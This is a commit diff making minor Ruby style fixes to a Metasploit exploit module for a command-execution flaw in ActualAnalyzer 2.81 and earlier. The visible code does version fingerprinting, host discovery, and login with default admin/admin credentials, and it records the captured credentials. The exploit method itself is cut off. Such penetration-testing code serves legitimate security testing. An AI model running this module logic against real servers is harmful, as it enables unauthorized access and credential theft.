Minor ruby style cleanup
Jon Hart
parent
1d1aa5838f
commit
24f1b916e0
|
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
|
@ -11,10 +11,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(
|
||||
info,
|
||||
'Name' => "ActualAnalyzer 'ant' Cookie Command Execution",
|
||||
'Description' => %q{
|
||||
This module exploits a command execution vulnerability in
|
||||
This module exploits a command execution vulnerability in
|
||||
ActualAnalyzer version 2.81 and prior.
|
||||
|
||||
The 'aa.php' file allows unauthenticated users to
|
||||
|
|
@ -47,13 +48,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Aug 28 2014',
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
|
||||
OptString.new('USERNAME', [false, 'The username for ActualAnalyzer', 'admin']),
|
||||
OptString.new('PASSWORD', [false, 'The password for ActualAnalyzer', 'admin']),
|
||||
OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', ''])
|
||||
], self.class)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
|
||||
OptString.new('USERNAME', [false, 'The username for ActualAnalyzer', 'admin']),
|
||||
OptString.new('PASSWORD', [false, 'The password for ActualAnalyzer', 'admin']),
|
||||
OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', ''])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
#
|
||||
|
|
@ -77,8 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if !res
|
||||
vprint_error("#{peer} - Connection failed")
|
||||
return Exploit::CheckCode::Unknown
|
||||
elsif res.code == 200 && res.body =~ /title="ActualAnalyzer Lite \(free\) ([\d\.]+)"/
|
||||
version = $1
|
||||
elsif res.code == 200 && res.body =~ /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/
|
||||
vprint_status("#{peer} - Found version: #{version}")
|
||||
return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new('2.81')
|
||||
return Exploit::CheckCode::Detected
|
||||
|
|
@ -116,13 +117,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
)
|
||||
if !res
|
||||
vprint_error("#{peer} - Connection failed")
|
||||
elsif res.body =~ /<option value="?[\d]+"?[^>]*>Page: https?:\/\/([^\/^<]+)/
|
||||
analytics_host = $1
|
||||
elsif res.body =~ /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/
|
||||
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
|
||||
return analytics_host
|
||||
else
|
||||
vprint_status("#{peer} - Could not find any hosts on view.php")
|
||||
end
|
||||
analytics_host
|
||||
end
|
||||
|
||||
#
|
||||
|
|
@ -138,13 +138,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
)
|
||||
if !res
|
||||
vprint_error("#{peer} - Connection failed")
|
||||
elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/([^\/^']+)/
|
||||
analytics_host = $1
|
||||
elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/
|
||||
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
|
||||
return analytics_host
|
||||
else
|
||||
vprint_status("#{peer} - Could not find any hosts on code.php")
|
||||
end
|
||||
analytics_host
|
||||
end
|
||||
|
||||
#
|
||||
|
|
@ -178,8 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
vprint_error("#{peer} - Connection failed")
|
||||
elsif res.code == 200 && res.body =~ />Login</
|
||||
vprint_status("#{peer} - Login failed.")
|
||||
elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/([^\/^']+)/
|
||||
analytics_host = $1
|
||||
elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/
|
||||
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
|
||||
print_good("#{peer} - Login successful! (#{user}:#{pass})")
|
||||
service_data = {
|
||||
|
|
@ -191,7 +189,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
credential_data = {
|
||||
origin_type: :service,
|
||||
module_fullname: self.fullname,
|
||||
module_fullname: fullname,
|
||||
private_type: :password,
|
||||
private_data: pass,
|
||||
username: user
|
||||
|
|
@ -205,10 +203,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
login_data.merge!(service_data)
|
||||
create_credential_login(login_data)
|
||||
return analytics_host
|
||||
else
|
||||
vprint_status("#{peer} - Could not find any hosts on admin.php")
|
||||
end
|
||||
analytics_host
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
|
|||
Loading…
Reference in New Issue